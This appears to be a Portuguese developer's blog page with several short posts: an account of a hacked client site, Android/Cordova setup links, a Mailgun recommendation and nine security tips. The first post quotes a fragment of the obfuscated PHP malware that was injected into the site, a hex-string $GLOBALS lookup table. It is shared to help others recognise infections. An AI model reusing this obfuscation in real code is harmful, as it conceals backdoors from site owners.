Link

Exploit com superglobals do php

Pessoal,

Ano passado tive muito probleminha com invasão em um site que dou manutenção. Este site anunciou em tv, outdoor e etc. E ai já sabe né? Prego que se destaca, leva martelada.

O site era versionado com git. Logo, após as invasões, eu consegui facilmente identificar os arquivos injetados. Os arquivos geralmente continham algo parecido com isso:

<?php $GLOBALS['v5fd1710b'] = "\x34\x30\xa\x33\x6f\x52\x5e\x71\x2a\x24\x66\x3e\x78\x50\x2d\x4b\x2c\x6b\x35\x5b\x5d\x7a\x58\x9\x47\x69\x41\x45\x21\x56\x68\x7d\x7b\x36\x76\x73\x6a\x7c\x6e\x6c\x64\x26\x43\x5a\x48\x3a\x25\x6d\x40\x23\x60\x70\x4e\x7e\x4a\x3c\x72\x44\xd\x4f\x62\x74\x20\x28\x46\x63\x5c\x65\x4c\x31\x54\x32\x3f\x67\x3d\x75\x49\x22\x42\x61\x51\x57\x5f\x27\x38\x2e\x59\x53\x2b\x37\x39\x4d\x29\x2f\x79\x55\x3b\x77";
$GLOBALS[$GLOBALS['v5fd1710b'][38].$GLOBALS['v5fd1710b'][79].$GLOBALS['v5fd1710b'][10].$GLOBALS['v5fd1710b'][1].$GLOBALS['v5fd1710b'][18].$GLOBALS['v5fd1710b'][84].$GLOBALS['v5fd1710b'][79]] = $GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][30].$GLOBALS['v5fd1710b'][56];
$GLOBALS[$GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][90].$GLOBALS['v5fd1710b'][89].$GLOBALS['v5fd1710b'][10]] = $GLOBALS['v5fd1710b'][4].$GLOBALS['v5fd1710b'][56].$GLOBALS['v5fd1710b'][40];

Após uma pesquisa rápida, achei um link que foi muito útil pra mim e espero que sirva pra vocês também (na verdade eu espero que vocês não passem por isso):

https://www.conetix.com.au/blog/php-superglobals-exploit

Link

Links: montando ambiente e compilando apps cordova

Pessoal,

Alguns links que me ajudaram muito na criação de ambiente android e um fórum bacana que tem uma comunidade muito legal pra tirar dúvidas (old but gold):

Fórum: http://www.androidz.com.br/forum/forum/5-android-developers/
Link 1: http://opensourceforu.com/2011/08/build-android-apps-using-html-with-phonegap/
Link 2: http://blog.algorich.com.br/2012/07/23/iniciando-no-desenvolvimento-android-com-phonegap/

Link

Mailgun – Alternativa para Mandrill

Olá pessoal,

Recentemente o mandrill (api para disparo de e-mails) removeu o plano gratuito que MUITA gente utilizava com fé na sua gratuidade. Ferrou!!

Como sempre (ou quase sempre), tem um carinha de stand-by pronto para nos ajudar.
Nesse caso, mailgun caiu muito bem.  🙂

O mailgun disponibiliza (até o momento deste post) 10 mil disparo de e-mails gratuitos, por cada conta. Acredito que, para um projeto que quer uma solução de e-mail grátis e com bastante integração, 10 mil e-mails está de bom tamanho.

Enfim, deem uma olhada no mailgun e aproveitando a oportunidade, irei deixar aqui também uma referencia a um pacote muito bacana que utilizei para integrar o mailgun com o Laravel. Espero que gostem.

https://github.com/Bogardo/Mailgun

Utilizem bastante.   🙂

Link

Dicas para uma postura digital mais segura – Segurança

Olá pessoal,

Dando aquele refresh diário nos meus feeds, achei “9 dicas para uma postura digital mais segura”. Originalmente postado pela b2b magazine.

Fique atento!  🙂

1- Evite o uso de dispositivos móveis em redes abertas. A segurança da comunicação de dados por cada um dos aplicativos não pode ser identificada facilmente.

2- Não utilize os serviços de nuvem para informações confidenciais, você não sabe como elas estão sendo armazenadas.

3- Lembre-se de perguntar antes de utilizar um novo serviço ou dar acesso as suas informações a esse serviço: ‘Será que se essa informação for capturada por outra pessoa, vou me sentir constrangido ou terão acesso a algo que eu não quero que acessem?’.

4- Instale um aplicativo de localização de seu dispositivo para casos de perda ou roubo. Dessa forma você poderá apagar os dados armazenados se necessário.

5- Tenha cautela ao usar seu dispositivo pessoal para armazenar e ou acessar informações corporativas, isso pode gerar punição da empresa em alguns casos.

6- Desabilite o wireless/bluetooth do seu aparelho quando não utilizado. Essas tecnologias abrem portas para serem exploradas indevidamente.

7- Mantenha seu dispositivo e seus aplicativos atualizados. As atualizações corrigem falhas de segurança conhecidas pelo desenvolvedor do app.

8- Leia as informações de acesso que os aplicativos solicitam ao serem instalados em seu dispositivo e avalie a coerência. Por exemplo: um aplicativo de localização não necessita do acesso aos contatos do seu telefone para indicar o melhor caminho para um destino.

9- Se você perceber que algum dos seus serviços não está funcionando adequadamente em determinada rede, desconecte-se imediatamente.